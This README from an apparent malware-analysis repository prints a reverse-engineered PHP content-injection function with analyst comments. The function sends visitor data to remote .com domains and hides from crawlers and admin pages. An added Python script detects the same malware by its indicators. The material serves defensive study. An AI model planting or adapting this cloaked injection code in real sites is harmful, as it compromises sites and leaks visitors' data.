This repository is the result of reverse engineering a piece of PHP malware that performs content injection.
The full description can be found in English at (@todo add link here) and in Portuguese at (@todo add link here).
Authors of this work (the reverse engineering, not the malware):
- Bernardo Donadio bcdonadio at bcdonadio.com
- Emerson Rocha Luiz emerson at alligo.com.br
```php
/** REVENGNOTE: Do not assume that this malware will have the same function names,
 * even across samples of the same malware.
 */
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    /** REVENGNOTE: this next array does nothing here, but it was in the original code.
     * 33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
     * are domains that (currently) point to the same working server;
     * they are used to create the content injected into the user's pages.
     */
    $domarr = array(
        "33db9538",
        "9507c4e8",
        "e5b57288",
        "54dfa1cb"
    );
    /** REVENGNOTE: this is very important. It does NOT inject content into the site
     * if the visitor is a search engine (which could alert the site admin to this
     * malware), and it also does not inject on pages that look like
     * administrator interfaces. It also checks for a valid HTTP_REFERER, so
     * sometimes sharing a link with a friend will not work at all, because
     * you need to navigate on the site first.
     * It is very likely that most common antivirus agents will pass this basic
     * check, but the remote server will recognise their user agent and will
     * return empty content.
     */
    if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin") or (preg_match("/" . implode("|", array(
        "google",
        "slurp",
        "msnbot",
        "ia_archiver",
        "yandex",
        "rambler"
    )) . "/i", strtolower($a)))) {
        $o1 = "";
    } else {
        $op = mt_rand(100000, 999999);
        $g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
        $url = "http://" . cqq(".com") . "/" . $g4;
        $ca1 = en2(@gtd($url), $op);
        $a1 = @explode("!NF0", $ca1);
        if (sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}
```
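As an added example (not part of this repository or of the malware), the following Python triage script scores PHP source text on the indicators visible in the snippet above (the "!NF0" delimiter, the crawler allow-list, the double urlencode, the six-digit mt_rand token, the "non" sentinel and the "admin" path check) rather than on function names, since the REVENGNOTE says those change between infections. The two PHP inputs are constructed for the demonstration; the suspect one mirrors the snippet with renamed helpers.

```python
import re
from typing import Dict, List

# Indicators taken from the reverse-engineered sample. Function names are
# deliberately ignored: the REVENGNOTE says they differ between infections.
INDICATORS: Dict[str, re.Pattern] = {
    "nf0_delimiter": re.compile(r'["\']!NF0["\']'),          # explode("!NF0", ...)
    "double_urlencode": re.compile(r'urlencode\(\s*urlencode\('),
    "six_digit_token": re.compile(r'mt_rand\(\s*100000\s*,\s*999999\s*\)'),
    "non_sentinel": re.compile(r'==\s*["\']non["\']'),        # missing $_SERVER key
    "admin_path_check": re.compile(
        r'strrpos\(\s*strtolower\(\s*\$\w+\s*\)\s*,\s*["\']admin["\']'),
}
CRAWLERS = re.compile(r"\b(google|slurp|msnbot|ia_archiver|yandex|rambler)\b", re.I)
FLAG_THRESHOLD = 3  # require several independent indicators before alerting


def match_indicators(php_source: str) -> List[str]:
    """Return the names of the indicators present in one PHP source text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(php_source)]
    # The crawler allow-list only counts when most of the sample's names appear
    # together; a lone "google" or "yandex" is common in legitimate code.
    crawlers = {m.lower() for m in CRAWLERS.findall(php_source)}
    if len(crawlers) >= 4:
        hits.append("crawler_allowlist")
    return hits


def is_suspicious(php_source: str) -> bool:
    return len(match_indicators(php_source)) >= FLAG_THRESHOLD


# Constructed input mirroring the snippet above, with the function names changed.
SUSPECT_PHP = r'''<?php
function q71() {
  $a = v71("HTTP_USER_AGENT"); $c = v71("REMOTE_ADDR"); $e = v71("PHP_SELF");
  if (($a == "non") or ($c == "non") or strrpos(strtolower($e), "admin")
      or preg_match("/" . implode("|", array("google", "slurp", "msnbot",
      "ia_archiver", "yandex", "rambler")) . "/i", strtolower($a))) { return ""; }
  $op = mt_rand(100000, 999999);
  $g4 = $op . "?" . urlencode(urlencode(z71($op, $a)));
  $a1 = @explode("!NF0", e71(@f71("http://" . h71(".com") . "/" . $g4), $op));
  return sizeof($a1) >= 2 ? $a1[1] : "";
}'''

# Constructed benign input: crawler names and mt_rand used for ordinary reasons.
BENIGN_PHP = r'''<?php
// Serve a lighter page to google and yandex crawlers.
$is_bot = preg_match("/google|yandex/i", $_SERVER["HTTP_USER_AGENT"] ?? "");
$nonce = mt_rand(100000, 999999);
echo $is_bot ? render_light($nonce) : render_full($nonce);'''
```

Run `match_indicators` over each `.php` file of a site to get a per-file list of matched indicators; the benign sample scores a single indicator and is not flagged, while the suspect sample matches all six.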
This is a reverse engineering of malicious code found on compromised servers. The use of this code without the explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use it except for educational purposes.